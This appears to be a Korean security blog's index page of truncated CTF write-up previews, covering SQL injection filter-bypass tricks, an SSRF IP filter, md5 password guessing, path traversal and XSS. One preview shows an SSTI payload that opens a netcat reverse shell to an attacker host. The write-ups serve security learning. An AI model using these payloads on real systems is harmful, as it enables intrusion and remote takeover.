주석 #, --, /**/ Express string select 0x6162; -> ab select 0b110000101100010; -> ab select char(0x61, 0x62); -> ab select concat(char(0x61), char(0x62)); -> ab select mid(@@version,12,1); -> n /* Using Gadget... */ select 'adm' 'in'; -> admin select 'ad''min'; -> ad'min select unhex(unhex(3631363236333634)); -> abcd Useful Functions 1. string substring(), substr(), mid() # select mid('abcde', 2, ..
보호되어 있는 글입니다.
urlcheck1 - 98 points app.re_ip = re.compile('\A(\d+)\.(\d+)\.(\d+)\.(\d+)\Z') def valid_ip(ip): matches = app.re_ip.match(ip) if matches == None: return False ip = list(map(int, matches.groups())) if any(i > 255 for i in ip) == True: return False # Stay out of my private! if ip[0] in [0, 10, 127] \ or (ip[0] == 172 and (ip[1] > 15 or ip[1] < 32)) \ or (ip[0] == 169 and ip[1] == 254) \ or (ip[0]..
Migration 두 개의 링크를 주고 있다. http://migration.sstf.site:5555/ http://migration.sstf.site:7777/ 첫번째 링크에는 register가 포함되있고 두번째 링크는 로그인 후 admin 페이지를 제공해준다. 문제에서 주어진 파일을 보면 user의 정보를 포함하고 있는데 아래와 같이 이루어져 있다. idx user_id password 1 user1 c4ca4238a0b923820dcc509a6f75849b 2 user2 c81e728d9d4c2f636f067f89cc14862c 이때 password는 md5해쉬로 이루어져 있었고 user1의 password가 1인걸로 봐선 나머지 유저의 password도 id에 붙어있는 숫자라는 것을 추측해낼 수..
보호되어 있는 글입니다.
ascii-inbox The problem is giving two websites. 1.https://challs.m0lecon.it:8003/ - Inbox 2.https://challs.m0lecon.it:8004/ - Ascii The discription gave me 404 pages as a hint. I immediately thought of a ssti and tried an attack. I tried reverse shell and I could get shell. https://challs.m0lecon.it:8004/{{url_for.__globals__.os.popen('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ip por..
보호되어 있는 글입니다.
문제에 들어가면 귀여운 고양이 사진이 보인다. 일단 소스코드를 확인해보면 black grey red white not like sumthing? send it hier 위와 같이 코드가 되있는데 나는 http://catweb.zajebistyc.tf/cats?kind=이부분이 수상해보였고 접속해보니 다음과 같았다. kind 파라미터 값에 따라서 json형식으로 사진파일이름을 전달해주는 것 같았다. 아무거나 넣어보고 있었는데 ?kind=/형식으로 전달해주니 내부 디렉토리를 보는 것이 가능했다. 플래그는 templates폴더 내부에 존재했지만 flag.txt에 접근하는 것은 안됬다(404가 뜬다) 문제에서 보면 report기능이 있는 것으로 봐서 xss문제라고 생각했고 json형식으로 값이 전달될 때 우리가..